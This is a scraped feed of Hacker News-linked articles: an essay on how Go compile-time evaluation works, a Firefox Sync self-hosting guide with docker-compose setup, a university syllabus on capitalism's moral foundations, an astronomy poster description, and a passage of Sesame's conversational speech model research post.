    This quote applies just as much to developers as it does non-tech people, sometimes more. I remember towards the beginning of my programming journey (both the first time I learned 18+ years ago, and again ~15 years later), the root cause of the feeling responsible for what they call tutorial hell (I personally loathe tutorials, and always chose to instead try to build things myself, and I attribute a great deal of the relative success I have achieved to this).

    The situation:

    You feel like you understand perfectly how to properly swing a hammer, lay brick, frame drywall, and you learned the right way to measure and cut beams with a saw, yet you still look at buildings and architecture and stand completely baffled that those tools you have learned were the same ones used to build these great structures. With no idea where to start, you stare at your tools, supplies and materials wondering if they must have some kind of special equipment or secret freemason knowledge that you don't have access to. You don't know how someone ended up with that result, using the same tools you see in front of you, and you definitely cannot imagine cutting the first board or laying the first brick.

    Many know that this is the exact feeling of learning how to program, and fully grasping the concepts of loops, variables, data structures, trees, stacks, linked-lists, arrays, control flow, etc, etc, etc... then looking at a compiler, a video game, an operating system, web browser and thinking yeah right.... Those devs must all have started programming C and x86 assembly while they were in diapers, and all attended Stanford where they were taught secret knowledge passed down from Ken Thompson, by Brian Kernaghan himself.

    Assuming you don't take the strict path of the JS frameworker vercel user: eventually after enough time, you start to recognize patterns. You 'go to definition' on enough methods from libraries you use to see how they are implemented and you build enough side projects and watch enough 'tsoding daily', 'sphaerophoria', and 'awesomekling' to begin to demystify at least how things like web/network protocols, or image/video encodings, syscalls/file IO operations work at some level. You no longer would feel completely lost if you had to write a shell or a lisp interpreter: you would at the very least know that to begin, you would probably have to read the source file into memory and break it up into tokens before trying to parse it to build the syntax tree needed so you can traverse and analyze it before stepping through it to execute the code. Previously, what now feels so obvious to you, would have seemed some kind of sorcery reserved only for the aforementioned programming elite.

    I'm sure I'm not alone, in that each time you pull the curtain off a piece of 'magic', you have the same thought:

    Oooooh yeah. I mean, well duh.. how else would you do that? I can't believe I couldn't see it.

    As time goes on, there are less and less things I run into where I cannot mentally parse at least from a very broad and high level, what an implementation might look like. Now I definitely don't claim to know how kernel internals, 3d rendering, or GPU drivers work, but what I mean is most things have lost the shadowy mystique, and feel more like something I can get excited to learn about, rather than a scary forbidden knowledge I will never be allowed to possess. Although for those things, that may as well be the case ;)

    The other day, after a long day's work managing synchronizing different environments/k8s clusters, I decided to browse HN as I normally do at that time. I ran into a post referencing comptime for Go, that linked to a github repo. It immediately caught my attention, as although I have not written Zig myself, Andrew Kelly is one of my programming idols and I definitely follow zig's development. Comptime is one of Zig's most envied language features, and although it is achievable via metaprogramming or constexpr in other languages, zig's straightforward procedural approach/API makes it particularly unique and admired.

    This was when I came upon that familiar feeling:

    How tf

    Confused..

    ^^^^^^ Me if you had told me I had to implement comptime in go without touching the compiler

    So I decided that I had to know how this was done, and I had a few hours to spare so I decided I would maybe try to contribute, or at least add some kind of feature of any level of value, just to force myself to understand what was going on here.

    Then after a brief peruse through the code...

    Turns out, you can use the source file information you get through this flag you can pass at build time in Go called -toolexec which allows you to invoke toolchain programs, in this case the prep binary, which is called with the absolute path of the program and by using a combination of another one of the author's packages, goinject, and the yaegi: (yet another elegant Go interpreter) library: you can get the AST, file decorator and import restorer, by implementing Modifier, which then allows you to collect the variables from the relevant function in the tree, output them each to a temporary file, on which you run the interpreter, giving you the computed results of foo in prep.Comptime(foo()), which you then use to replace the values in the DST by the Modify pass. viola, you have achieved compile time computations.

    Oh, well yeah. That makes perfect sense. I mean how else did I think it was gonna work?

    After a couple hours, I had added variable scoping, and global const declarations which I concluded was actually not a useful feature at all, because each function is evaluated on it's own, leaving essentially a 0% chance of actual naming/scope conflicts. But the point is, I didn't discover that until I had finished writing it with some tests, and although the 'feature' is useless, the whole process was a very valuable learning experience and all around good use of my time.

    This is just a reminder to everyone at different levels of their developer journey, that the "magic" is not real and the overwhelming majority of the time, you are simply lacking the necessary context and it will likely make perfect sense to you as soon as you have it.

    It's always worth your time to learn parts of the stack that you might not work in daily. As you build your fundamental understanding, it demystifies other pieces of the puzzle that you would never would have put together otherwise. Even if it doesn't feel important now, I guarantee the knowledge pays off at some point in the future.

    Keep learning every day, strive for deeper understanding, and spend time building or hacking on even things that are considered 'solved problems'. Even if you are only paid to write React, it is very much of value to you and your career to understand how the internals work, or how your one-click 'serverless' auto-scaling deployments work...

    (hint: servers)

    ]]>
    https://pthorpe92.dev/magic/ hacker-news-small-sites-43214353 Sat, 01 Mar 2025 01:09:22 GMT
    <![CDATA[Self-Hosting a Firefox Sync Server]]> thread link) | @shantara
    February 28, 2025 | https://blog.diego.dev/posts/firefox-sync-server/ | archive.org

    After switching from Firefox to LibreWolf, I became interested in the idea of self-hosting my own Firefox Sync server. Although I had seen this was possible before, I had never really looked into it—until now. I embarked on a journey to set this up, and while it wasn’t completely smooth sailing, I eventually got it working. Here’s how it went.

    Finding the Right Sync Server

    Initial Search: Mozilla’s Sync Server Repo

    I started by searching for “firefox sync server github” and quickly found Mozilla’s syncserver repo. This is an all-in-one package designed for self-hosting a Firefox Sync server. It bundles both the tokenserver for authentication and syncstorage for storage, which sounded like exactly what I needed.

    However, there were two red flags:

    1. The repository had “failed” tags in the build history.
    2. A warning was prominently displayed stating that the repository was no longer being maintained and pointing to a new project in Rust.

    Switching to Rust: syncstorage-rs

    With that in mind, I followed the link to syncstorage-rs, which is a modern, Rust-based version of the original project. It seemed like the more viable option, so I decided to move forward with this one. But first, I wanted to check if there was a ready-to-go Docker image to make deployment easier. Unfortunately, there wasn’t one, but the documentation did mention running it with Docker.

    This is where things started to get complicated.

    Diving Into Docker: Confusion and Complexity

    Documentation Woes

    The Docker documentation had some strange parts. For example, it mentioned:

    • Ensuring that grpcio and protobuf versions matched the versions used by google-cloud-rust-raw. This sounded odd—shouldn’t Docker handle version dependencies automatically?
    • Another confusing part was the instruction to manually copy the contents of mozilla-rust-sdk into the top-level root directory. Again, why wasn’t this step automated in the Dockerfile?

    At this point, I was feeling a bit uneasy but decided to push forward. I reviewed the repo, the Dockerfile, the Makefile, and the circleci workflows. Despite all that, I was still unsure how to proceed.

    A Simpler Solution: syncstorage-rs-docker

    I then stumbled upon dan-r’s syncstorage-rs-docker repo, which had a much simpler Docker setup. The description explained that the author had also encountered issues with the original documentation and decided to create a Docker container for their own infrastructure.

    At this point, I felt reassured that I wasn’t alone in my confusion, and decided to give this setup a try.

    Setting Up the Server: Docker Compose and MariaDB

    Docker Compose Setup

    I copied the following services into my docker-compose.yaml:

      firefox_mariadb:
        container_name: firefox_mariadb
        image: linuxserver/mariadb:10.6.13
        volumes:
          - /data/ffsync/dbdata:/config
        restart: unless-stopped
        environment:
          MYSQL_DATABASE: syncstorage
          MYSQL_USER: sync
          MYSQL_PASSWORD: syncpass
          MYSQL_ROOT_PASSWORD: rootpass
    
      firefox_syncserver:
        container_name: firefox_syncserver
        build:
          context: /root/ffsync
          dockerfile: Dockerfile
          args:
            BUILDKIT_INLINE_CACHE: 1
        restart: unless-stopped
        ports:
          - "8000:8000"
        depends_on:
          - firefox_mariadb
        environment:
          LOGLEVEL: info
          SYNC_URL: https://mydomain/sync
          SYNC_CAPACITY: 5
          SYNC_MASTER_SECRET: mastersecret
          METRICS_HASH_SECRET: metricssecret
          SYNC_SYNCSTORAGE_DATABASE_URL: mysql://sync:usersync@firefox_mariadb:3306/syncstorage_rs
          SYNC_TOKENSERVER_DATABASE_URL: mysql://sync:usersync@firefox_mariadb:3306/tokenserver_rs
    

    A few tips:

    • Be cautious with the database passwords. Avoid using special characters like "/|%" as they can cause issues during setup.
    • I added the BUILDKIT_INLINE_CACHE argument to the Docker Compose file to make better use of caching, which reduced build time while testing.

    Initializing the Database

    I cloned the repository and copied the Dockerfile and initdb.sh script to my server. After making some tweaks, I ran the following steps to get the database up and running:

    1. Bring up the MariaDB container:
      docker-compose up -d firefox_mariadb
      
    2. Make the initialization script executable and run it:
      chmod +x initdb.sh
      ./initdb.sh
      

    Bringing the Stack Online

    Finally, I brought up the entire stack with:

    Configuring Reverse Proxy with Caddy

    Next, I needed to update my Caddy reverse proxy to point to the new Sync server. I added the following configuration:

    mydomain:443 {
         reverse_proxy firefox_syncserver:8000 {
        }
    }
    

    After updating Caddy with the DNS entry, I restarted the proxy and the sync server was up and running.

    Challenges Faced

    While I eventually got everything working, there were a few notable challenges along the way:

    1. Database persistence: I had issues with persistent data when restarting the MariaDB container. Make sure to clear out old data if needed.
    2. Server storage: My server ran out of space during the build process due to the size of the Docker images and intermediate files.
    3. Following the right steps: It took me a while to figure out the right steps, and much of the time was spent experimenting with the Docker setup.

    Final Thoughts

    Setting up a self-hosted Firefox Sync server is not the easiest task, especially if you’re not very familiar with Docker or database management. The official documentation is confusing, but thanks to community efforts like the syncstorage-rs-docker repo, it’s doable.

    In the end, it took me about two hours to get everything running, but it was worth it. If you’re looking to control your own Firefox Sync server, this guide should help you avoid some of the pitfalls I encountered.

    Happy syncing!

    ]]>
    https://blog.diego.dev/posts/firefox-sync-server/ hacker-news-small-sites-43214294 Sat, 01 Mar 2025 01:03:48 GMT
    <![CDATA[Moral Foundations of Capitalism]]> thread link) | @yamrzou
    February 28, 2025 | http://rdc1.net/class/Moral%20Foundations/Moral_Foundations_Iindex.html | archive.org

    Athens Ancient Market Place
    Muenster Market
    cycle rack
    Econ 411
    Moral Foundations of Capitalism

    Spring 2025

    WVU Class and Time
    Brooks Hall D 225 T-Th  4:00-5:15
    Instructor: Professor Roger D. Congleton  
    Office: 5201 Reynolds Hall .
    .Office Phone  3-7866  (during office hours)

    .E-Mail
     roger.congleton@mail.wvu.edu
    (e-mail is the most reliable way to reach me).
    Office Hours: 2:30-3:30 Tuesday and Thursdays, and most other afternoon times by appointment
    Required Texts: Congleton, R. D., Solving Social Dilemmas: Ethics, Politics, and Prosperity. Oxford University Press.  (Plus class webnotes, links provided below)
    .
    Optional Texts
    Source Material for the Course*

    .    Aristotle (350 bc) Nicomachean Ethics (Available as an E-book from Google, Liberty Fund, Amazon, etc.)
        Buchanan, J. M. (1997) Ethics and Economic Progress. Norman OK: University of Oklahoma Press.
        Mill, J. S. (1863) On Liberty. Boston: Ticnor and Fields. (Available as an E-book from Google and Liberty Fund).
        Rand, A.(2005) Atlas Shrugged. New York: Penguin. (Available as an E-book from Google and Amazon).
        Smith, A. (1776) An Inquiry Into the Nature and Causes of the Wealth of Nations. (Available as an e-book from Google and Liberty Fund).
        Spencer, H. (1896) Principles of Ethics. Appleton and Company, New York. (Available as an e-book at Liberty Fund and at the Von Mises Institute)
       
    Weber, Max (1930) The Protestant Ethic and the Spirit of Capitalism. (Available as an e-book from Google and Amazon.)

    Course Description: Tentative Syllabus (as a PDF)
    .
    . Moral Foundations of Capitalism is a lecture-based course that explores how some types of ethical dispositions--internalized rules--allow markets to become larger and more effective sources of food, material comfort, and entertainment. They do so  by reducing unproductive conflict, avoiding over use of common resources, simplifying contract enforcement, internalizing externalities,  reducing team production problems, encouraging capital accumulation and innovation, and avoiding counter productive public policies. The great acceleration of commerce that "took off" during the nineteenth century that produced the effective markets that we largely take for granted today was associated with a shift in norms that generally supported market activities.

    Whether then we suppose that the End impresses each man's mind with certain notions not merely by nature, but that there is somewhat also dependent on himself; or that the End is given by nature, and yet Virtue is voluntary because the good man does all the rest voluntarily, Vice must be equally so;

    Aristotle (2012-05-17). Ethics (p. 82).  . Kindle Edition.

    For not only is a developed sense of responsibility absolutely indispensable, but in general also an attitude which, at least during working hours, is freed from continual calculations of how the customary wage may be earned with a maximum of comfort and a minimum of exertion. Labor must, on the contrary, be performed as if it were an absolute end in itself, a calling. But such an attitude is by no means a product of nature.

    Weber, Max (2012-10-21). The Protestant Ethic and the Spirit of Capitalism (Kindle Locations 311-314). Vook, Inc.. Kindle Edition.

    The course is divided in to three parts. (1) The first part reviews theories of ethics from Aristotle through A. Pigou. This intellectual history introduces students to several theories of ethics.The theories demonstrate that ethics is not simply a gut feeling, but may have rational foundations. The overview also provides evidence that ethical theories in the West gradually became more supportive of commerce in the period before the great acceleration in the West during the nineteenth century. (2) The second part of the course uses game theory and economic theory to show how a subset of ethical dispositions can increase the efficiency and extent of exchange and production. When such ethical dispositions become commonplace, trading networks become more extensive, specialization increases, larger economic organizations become feasible, and rates of innovation tend to increase. In this manner, a commercial society can emerge. (3) The third part of the course explores  how normative theories affect governance and market relevant public policies. It demonstrates that the ethical dispositions of  voters and rule enforcers can make a government more likely to be "productive"  than "extractive."  Together the second and third parts show that without supportive norms, markets would be far smaller and less efficient, and average material welfare much lower.

    The main goals of the course are to induce students (1) to the idea of social dilemmas and the manner in which some ethical dispositions solve or moderate them and  (2) to increase their understanding of the many ways in which normative theories affect the extent of commerce. (3) The course also will mmake students more familiar with several of the core ethical arguments concerning the proper role of markets in a good life that emerged in the period from 1600-1920,.

    Overall the course suggests that some societies are richer than others because their normative culture--their most commonplace ethical dispositions--accord a broader role for commerce in a good life and good society than others, and also encourage the behavior that make markets and governments work more efficiently. In other words, it implies that commercial societies have moral foundations.

    Grades are determined by two examinations (60%), 6 quizzes (15%), and a final paper (25%).

    This exchange society and the guidance of the coordination of a far-ranging division of labor by variable market prices was made possible by the spreading of certain gradually evolved moral beliefs which, after they had spread, most men in the Western world learned to accept. These rules were inevitably learned by all the members of a population consisting chiefly of independent farmers, artisans and merchants and their servants and apprentices who shared the daily experiences of their masters…. They held an ethos that esteemed the prudent man, the good husbandman and provider who looked after the future of his family and his business by building up capital, guided less by the desire to be able to consume much than by the wish to be regarded as successful by his fellows who pursued similar aims.

    F. A. Hayek [1979/2011]. Law, Legislation and Liberty, Volume 3: The Political Order of a Free People [pp. 164–165]. University of Chicago Press; Kindle Edition.




    Tentative Course Outline .
    Dates Topic
     Readings
    .
    .

    0. Introduction to Moral Foundations of Capitalism

    January 14 Norms as personal motivations and self restraint. Two approaches to norms: positive--the study of the effects of norms, and normative--the application of normative theories to assess private behavior, societies, and market outcomes. Norms that help and hurt economic growth. Capitalism as a name for contemporary market-based networks and lifestyles. (Homo Constitutionalus)
    SSD- Preface, Ch 1

    Why MBA's Read Plato (WSJ)
    Vonnegut: Harrion Bergeron



    I. Theories  of the Role Commerce in a Good Life

    January 16, 21
    1. Aristotle's Ethics with Applications to Political and Economic Theory Ethics as the pursuit of lifetime happiness, rather than short term pleasure. Aristotle's principle of moderation in all things.Wealth as a means to an end. Aristotlian virtues. Aristotle as the foundation of contemporary secular ethics.
    SSD - Ch. 9
    January 23, 28
    2. The Early Enlightenment and Market Supporting Ethics.  Three major disruptions of the medieval order. Nature law and the moral sense. Markets as a dissipating or supporting system for ethical development. Rising importance of life on earth. Baxter and Barklay on duties on earth. Locke and the division between theological and civil ethics. (E-Campus Homework 1 Due Jan 30) SSD - Ch 10

    Links to Homeworks
    on Ecampus

    January 30, February 4
    3. Classical Liberalism, Ethics, and the Market. Montesquieu and the importance of political virtue. Franklin and the "spirit" of capitalism. Smith: moral sentiments and the impartial spectator as the source of ethics and virtue. Kantian duties and the moral imperative. Bastiat on market support for ethics. 
    SSD - Ch 11
    February 6, 11
    4. Utilitarianism: Trade Increases Social Welfare. Another secular core principle for the development of ethics. Bentham and the utilitarian revolution, Mill's extensions. Spencer's evolutionary approach. Do ethics improve survival prospects? Emergence of social ethics along with democratic politics. Ideology as social ethics.(E-Campus Homework 2, Due February 13)

    II. Ethics and the Extent of Commercial Networks

    February 13, 18, 20 5. Civil Ethics and Civil Society: A Game Theoretic Analysis
    (1) Introduction to Game Theory: Strategy Choice and Nash Equilibrium with Applications to Ethics and Civil Society, (2) Escaping the Hobbesian Dilemma, ethics and law as substitutes. (3) Solving  coordination games, (4) Internalizing Externalities
    (E-Campus Homework 3, Due February 24)

    SSD - Ch 2
    (Prerecorded Lecture, if necessary)
    February 25
    Review for Midterm Exam
    Study Guide I
    February 27
    Midterm Exam

    March 4
    Exams Returned and Reviewed

     March 6*, 11, 13
    6. Market Dilemmas and Ethical Solutions: The Ethical Foundations of Commerce
    (1) Economics of gains to trade and trading networks, (2) Problems of Team Production, how the work ethic improves team production and promotes specialization. How selecting ethical persons can improve profits and encourage some types of ethical behavior. (3) Transaction and Enforcement costs as a limit on the extent of trading networks and specialization. How ethics reduces contract complexity and enforcement costs and expand markets. Evidence of the importance of Trustworthiness. (E-campus Homework, 4 Due March 25)
    SSD - Ch 3
    (*March 6, travel day,
    prerecorded lecture)
    March 18, 20
    No Class Spring Break

    March 25, 27, April 1*
    7. Neoclassical Economics with Ethics. Bringing ethics into the Marginal Benefit Marginal Cost Framework, Marginal Revenue Product as a consequence of team production and private ethics.  Equilibrium investments and  distributions of Virtue. Ethics and Commerce are co-determined. 
    SSD - Ch 4
      (* April 1, travel day,
    prerecorded lecture)
    April 3*, 8
    8. Ethics and Economic Progress. Ethical aspects of progress. Economic growth requires solving social dilemmas associated with specialization, capital accumulation, and innovation. Ethical and/or support for economic development. (E-Campus Homework 5 Due April 10) SSD - Ch 5
    (*April 3, travel day,
    precorded lecture)

    III. Ethics, Politics, and Prosperity

    April 10
    9. Ethics and Governance. The simplest form of government: customary law enforcement.  Corruption and the moral mitigation of corruption. The role of ethics in simple productive governments. Customary and Common Law. Extractive versus productive governance. SSD - Ch 6
    April 15 10. Ethics and Democratic Public Policy.  Norms and Institutions for Good Governance. The median voter theorem(s). The democratic indecisivenss problem. The democratic poverty trap. The problem of holding the next election. Normative solution to democratic dilemmas..
    SSD - Ch 7

    April 17
    11. Ethics and Political-Economy System Choice. Ethics and the relative performance of political and economic systems. On the logic of a bounded domain for governance under different mixes of ethical disposition in government and markets. (E-Campus Homework 6 Due April 21)
    SSD - Ch 8
    April 22
    Review for Second Midterm
    Study Guide II
    April 24
     Second Midterm Exam

    April 29
    Exams Returned and Reviewed / Paper Workshop
    Paper Topics
    May 1
    Last Day of Class, Overview of Course and Paper Workshop
    SSD - Ch 13



    May 7
    Papers Due by Midnight (to be e-mailed to roger.congleton@mail.wvu.edu)
    .
    .




    “Look around you,” he said. “A city is the frozen shape of human courage—the courage of those men who thought for the first time of every bolt, rivet and power generator that went to make it. The courage to say, not ‘It seems to me,’ but ‘It is’—and to stake one’s life on one’s judgment. You’re not alone. Those men exist. They have always existed.

    Rand, Ayn (2005-04-21). Atlas Shrugged (pp. 473-474). Penguin Group. Kindle Edition.

    Grades:
    Midterm Exam
    and Endterm Exams

    60.00%

    6 Ecampus Quizzes
    Term Paper
    15.00%
    25.00%


    Marginal extra credit for extraordinary class participation (up to 5% bonus)


    Institutional Policies and Services: Students are responsible for reviewing policies on inclusivity, academic integrity, incompletes, sale of course materials, sexual misconduct, adverse weather, as well as student evaluation of instruction, and days of special concern/religious holiday statements.

    E Link to WVU Policies and Syllabus Addenda


    ]]>
    http://rdc1.net/class/Moral%20Foundations/Moral_Foundations_Iindex.html hacker-news-small-sites-43214014 Sat, 01 Mar 2025 00:32:04 GMT
    <![CDATA[An introduction to Elementary Game Theory [pdf]]]> thread link) | @yamrzou
    February 28, 2025 | http://rdc1.net/class/Intermediate_Micro/EC301HO7b.pdf | archive.org

    Unable to extract article]]>
    http://rdc1.net/class/Intermediate_Micro/EC301HO7b.pdf hacker-news-small-sites-43213956 Sat, 01 Mar 2025 00:27:33 GMT
    <![CDATA[The Celestial Zoo (2001)]]> thread link) | @okl
    February 28, 2025 | https://pablocarlosbudassi.com/2021/02/the-celestial-zoo-celestial-zoo-tour-of.html | archive.org

    Welcome to THE CELESTIAL ZOO, a tour of 210 destinations in the vast expanse of our Universe.

    This guide is designed to provide a 2-minute stay at each different cosmic landscape, with a couple of fast mindblowing facts and essential knowledge that hopefully will stick with you forever. We carefully selected the most peculiar galaxies, stars, planets, and other fluttering creatures for our vividly detailed safari.

    Available merch (Jan 2025 updated):

    The graphic showcases a circular master schematic of the observable universe projected on a radial logarithm with the Sun at its center. Each object in the schema has been labeled with a number for easy indexing in the surrounding text columns.

    The numbers assigned to each object follow the order of their proximity to the center of the solar system, beginning with the Sun(1) and extending outward through the planets and other objects of the solar system (2-51), nearby stars (52-112), distant notable stars, star clusters, and nebulae (113-123), nearby galaxies (124-156), notable galaxies, galactic clusters, and superclusters (157-203), and finally, the most distant known objects (203-210).

    The color code used in the title labels of each astronomical object corresponds to five categories: moon/asteroid/other, planets, star systems, galaxies, and large-scale objects.

    explore and zoom the full image further down

    The intention behind selecting the featured objects was to provide an overview of both well-known subjects familiar to the general public and lesser-known yet equally captivating ones.

    This infographic is the poster component of a multi-platform project also presented in pocket tourist guidebooks and short videos on social channels. Instagram, Facebook, Youtube, Twitter, and TikTok, accounts will be active to disseminate the diverse and fast-changing universe of our current astronomical understanding.
    As of April 2024, the poster and book have just been released in Spanish and are currently being translated into French and German. Overall, it was an exciting project for us to work on. We hope you find as much joy in exploring these materials as we did in creating them.

    ]]>
    https://pablocarlosbudassi.com/2021/02/the-celestial-zoo-celestial-zoo-tour-of.html hacker-news-small-sites-43213743 Sat, 01 Mar 2025 00:07:53 GMT
    <![CDATA[Show HN: Tracking President Trump's Executive Orders]]> thread link) | @LightMorpheus
    February 28, 2025 | https://tonygaeta.com/labs/executive-orders | archive.org

    Tracking President Trump's Executive Orders

    ]]>
    https://tonygaeta.com/labs/executive-orders hacker-news-small-sites-43212613 Fri, 28 Feb 2025 22:35:17 GMT
    <![CDATA["Enough with All the Raft" by Alex Miller]]> thread link) | @jamii
    February 28, 2025 | https://www.hytradboi.com/2025/2016d6c4-b08d-40b3-af2f-67926ca8521f-enough-with-all-the-raft | archive.org

    Unable to extract article]]>
    https://www.hytradboi.com/2025/2016d6c4-b08d-40b3-af2f-67926ca8521f-enough-with-all-the-raft hacker-news-small-sites-43211997 Fri, 28 Feb 2025 21:57:22 GMT
    <![CDATA[Crossing the uncanny valley of conversational voice]]> thread link) | @Matetricks
    February 28, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

    To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a

    single-stage model, thereby improving efficiency and expressivity. The second is our

    evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

    A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second-stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation; semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.

    Compute amortization

    This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden even with a small model slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

    Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 31 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

    Pronunciation correction sentence is a recording, all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

